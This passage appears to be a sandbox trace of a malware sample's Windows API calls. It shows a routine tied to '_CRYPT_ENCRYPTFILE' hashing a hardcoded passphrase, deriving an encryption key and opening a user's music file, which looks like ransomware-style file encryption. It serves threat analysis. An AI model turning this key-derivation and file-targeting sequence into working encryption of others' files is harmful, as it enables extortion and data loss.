dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.639] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0111.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d758 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0111.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0111.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca370, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0111.641] CloseHandle (hObject=0x298) returned 1 [0111.641] FreeLibrary (hLibModule=0x772d0000) returned 1 [0111.641] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0111.641] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\bg_rcFiS42y.mp3", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ca2b470, ftCreationTime.dwHighDateTime=0x1d5ec0d, ftLastAccessTime.dwLowDateTime=0x94593bc0, ftLastAccessTime.dwHighDateTime=0x1d5ec5c, ftLastWriteTime.dwLowDateTime=0x94593bc0, ftLastWriteTime.dwHighDateTime=0x1d5ec5c, nFileSizeHigh=0x0, nFileSizeLow=0x10430, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="bg_rcFiS42y.mp3", cAlternateFileName="BG_RCF~1.MP3")) returned 0x41ac280 [0111.641] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0111.642] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0111.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0111.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0111.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0111.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0111.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797028, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0111.642] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0111.643] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0111.643] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0111.643] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0111.643] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0111.643] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.643] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0111.684] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.684] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.684] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0111.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca940, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0111.684] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0111.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0111.684] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0111.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0111.685] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0111.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0111.685] CryptHashData (hHash=0x41ac180, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0111.685] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.685] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0111.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca7a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0111.685] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac180, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac640) returned 1 [0111.685] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0111.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0111.685] CryptDestroyHash (hHash=0x41ac180) returned 1 [0111.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0111.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0111.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0111.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0111.686] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0111.686] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0111.686] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0111.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0111.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0111.687] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\bg_rcFiS42y.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\bg_rcfis42y.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0111.687] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.687] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0111.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0111.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0111.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0111.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0111.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0111.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.688] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0111.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0111.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0111.688] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0111.688] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0111.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0111.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0111.689] RtlAllocateHeap 